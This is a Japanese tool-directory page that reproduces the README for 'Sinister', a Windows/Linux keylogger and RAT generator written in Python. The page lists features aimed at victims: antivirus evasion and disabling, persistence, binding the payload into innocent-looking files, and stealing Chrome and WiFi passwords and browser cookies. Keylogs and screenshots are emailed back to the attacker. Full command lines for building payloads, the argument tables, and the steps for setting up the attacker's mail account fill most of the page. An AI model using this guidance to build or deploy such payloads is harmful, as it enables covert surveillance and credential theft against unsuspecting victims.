Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/pushpenderindia/sinister
パスワードクラッキングペイロード生成永続化メカニズムデータ流出情報収集ポストエクスプロイトレッドチーミングリモートアクセスツール
GitHubpushpenderindia/sinister

Sinister

Sinisterは、キーログをメールで送信するWindows/Linux用キーロガージェネレーターで、その他の有益なターゲット情報も添付します。

リポジトリを見る
46593292年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Sinister ロゴ

Sinister

ハッカー GIF

                    この小さなPythonスクリプトは本当に素晴らしい仕事をしてくれます。

SinisterはWindows/Linux向けのキーロガージェネレーターで、キーログやスクリーンショットをメールで送信し、その他の重要なターゲット情報も一緒に送信します。Python 3で記述されています。

免責事項

:computer: このプロジェクトは良い目的と個人利用のためにのみ作成されました。

本ソフトウェアは「現状のまま」提供され、いかなる種類の保証もありません。お客様は自己責任で本ソフトウェアを使用してください。使用は全てエンドユーザーの責任です。開発者は一切の責任を負わず、本プログラムによって引き起こされた誤用や損害についても責任を負いません。

機能

  • Windows/Linuxで動作
  • 新しい被害者をメールで通知
  • 検出されない
  • 永続性
  • ペイロード生成前にメール認証情報を検証
  • GMAIL、YAHOO、OUTLOOK、カスタムSMTPなど、あらゆるメールプロバイダーでキーログを受信可能
  • SMTPサーバー/ポート
サーバー名SMTPサーバーSMTPポート
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • 被害者PCのスクリーンショットをメールで送信
  • 依存関係ゼロの実行可能バイナリを作成
  • 高度な機能を持つ約5MBのペイロードを作成
  • ペイロード生成前に難読化し、一部のアンチウイルスを回避
  • 生成されたペイロードはbase64でエンコードされ、リバースエンジニアリングが非常に困難
  • 被害者PCのアンチウイルスを停止し、セキュリティを無効化する機能
  • ペイロード生成のためのカラフルなインターフェース
  • 攻撃者側:ペイロード作成時に不足している依存関係を自動検出してインストール
  • アクティブウィンドウ名に基づいてログデータを区別(画像参照)
  • 悪意のあるファイルにカスタムアイコンを追加可能
  • 組み込みバインダー:キーロガーを任意のファイル[.pdf, .txt, .exeなど]にバインド可能。表向きは正当なファイルを実行し、バックエンドで悪意のあるコードをサービスとして実行。
  • システム上の既存のインスタンスをチェック。実行中のインスタンスがある場合は正当なファイルのみ実行(重複インスタンス禁止により重複メールログを防止)。
  • 攻撃者はLinuxシステムを使用してWindows/Linux両方のOS用のペイロードを作成/コンパイル可能。ただしWindowsマシンではWindows実行可能ファイルのみ作成/コンパイル可能。
  • 被害者システムから保存されたパスワードを取得し、攻撃者に送信。
組み込みスティーラーが盗むもの:
Chromeブラウザ(保存されたパスワード)
WiFi(保存されたパスワード)
Chromeクッキー(ログインデータ、クッキー、履歴)
Firefoxクッキー(cookies.sqlite)

注:カスタムスティーラーは独自にコーディングされており、LaZagneに依存していません。

  • 被害者デバイスの有用な情報を取得・送信
取得・送信されるもの:
オペレーティングシステム
コンピュータ名
ユーザー名
パブリックIPv4
  • ペイロードが実行できない場合は、--debugを指定してCMD付きのフォアグラウンドでexeを実行

重要

2022年5月30日、Googleは安全性の低いアプリのアクセス機能を削除しました。そのため、Gmailのパスワードの代わりに:

  • 攻撃者用Gmailで2段階認証を有効にする
  • アプリ固有のパスワードを作成する
  • ペイロード作成時にそのアプリ固有のパスワードを使用する
  • アプリ固有のパスワードの作成方法:こちらをクリック

動作確認済みOS

Kali) Kali Linux - ローリングエディション

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

前提条件

  • Python 3.X
  • いくつかの外部モジュール

Linuxでの使用方法

# /optディレクトリに移動(任意)
$ cd /opt/

# このリポジトリをクローン
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Sinisterフォルダに移動
$ cd Sinister

# 依存関係のインストール
$ bash installer_linux.sh

*** installer_linux.sh実行中にPythonインストーラーのダイアログが表示された場合の注意 ***
    * カスタムインストールをクリック
    * パスを選択: C:/Python37-32
    ### これにより、Pythonはこのパス(Wine内)にインストールされます: ~/.wine/drive_c/Python37-32

# installer_linux.shの実行中にエラーが発生した場合は、installer_linux.pyを使用してインストールを試みてください
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# ペイロード/RATの作成
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# GMAIL SMTPサーバー、ポート設定を使用したペイロード作成(デフォルトSMTPサーバー = smtp.gmail.com、デフォルトSMTPポート = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# OUTLOOK SMTPサーバー、ポート設定を使用したペイロード作成
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# YAHOO SMTPサーバー、ポート設定を使用したペイロード作成
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

注:iconフォルダ内のカスタムアイコンも使用できます。例: --icon icon/pdf.ico

Windowsでの使用方法

# 依存関係のインストール
$ 最新のPython 3.xをインストール

# このリポジトリをクローン
$ git clone https://github.com/PushpenderIndia/Sinister.git

# リポジトリに移動
$ cd Sinister

# 依存関係のインストール
$ python -m pip install -r requirements.txt

# Sinister.pyをテキストエディタで開き、16行目のWINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" を設定

# ヘルプメニューの表示
$ python Sinister.py --help

# ペイロード/RATの作成
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# GMAIL SMTPサーバー、ポート設定を使用したペイロード作成(デフォルトSMTPサーバー = smtp.gmail.com、デフォルトSMTPポート = 587)
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# OUTLOOK SMTPサーバー、ポート設定を使用したペイロード作成
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# YAHOO SMTPサーバー、ポート設定を使用したペイロード作成
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path

注:iconフォルダ内のカスタムアイコンも使用できます。例: --icon icon/pdf.ico

更新方法

  • 自動更新するにはupdater.pyを実行するか、このGitHubリポジトリから最新のZipファイルをダウンロードしてください。
  • 注:updater.pyを使用するにはGitがインストールされている必要があります。

注:悪意のあるファイルはSinister/フォルダ内のdist/フォルダに保存されます。

利用可能な引数

  • オプション引数
省略形完全形説明
-h--helpこのヘルプメッセージを表示して終了
-i INTERVAL--interval INTERVALレポート間の秒数。デフォルト=120
-t TIME_PERSISTENT--persistence TIME_PERSISTENT__秒後に永続化。デフォルト=10
-x SMTP_Server--smtpカスタムSMTPサーバー。デフォルト="smtp.gmail.com"
-y SMTP_Port--portカスタムSMTPポート。デフォルト=587
-w--windowsWindows実行可能ファイルを生成。
-l--linuxLinux実行可能ファイルを生成。
-s--steal-password被害者マシンから保存されたパスワードを盗む[対応OS: Windows]
-b file.txt--bind LEGITIMATE_FILE_PATH.pdf自動バインダー:正当なファイルのパスを指定。[対応OS: Windows]
-d--debugペイロードをCMDウィンドウ付きのフォアグラウンドで実行し、適切な実行エラーを取得

注:-w/--windows または -l/--linux のいずれかを指定する必要があります。

  • 必須引数
省略形完全形説明
--icon ICONアイコンパスを指定、悪意のあるファイルのアイコン[注:.ico形式である必要があります]
-e EMAIL--email EMAILレポートの送信先メールアドレス。
-p PASSWORD--password PASSWORD-e引数で指定したメールアドレスのパスワード。
-o OUT--out OUT出力ファイル名。

新しいスクリーンショット:

ヘルプの表示

ペイロードの生成

レポートの受信

ツールをダウンロード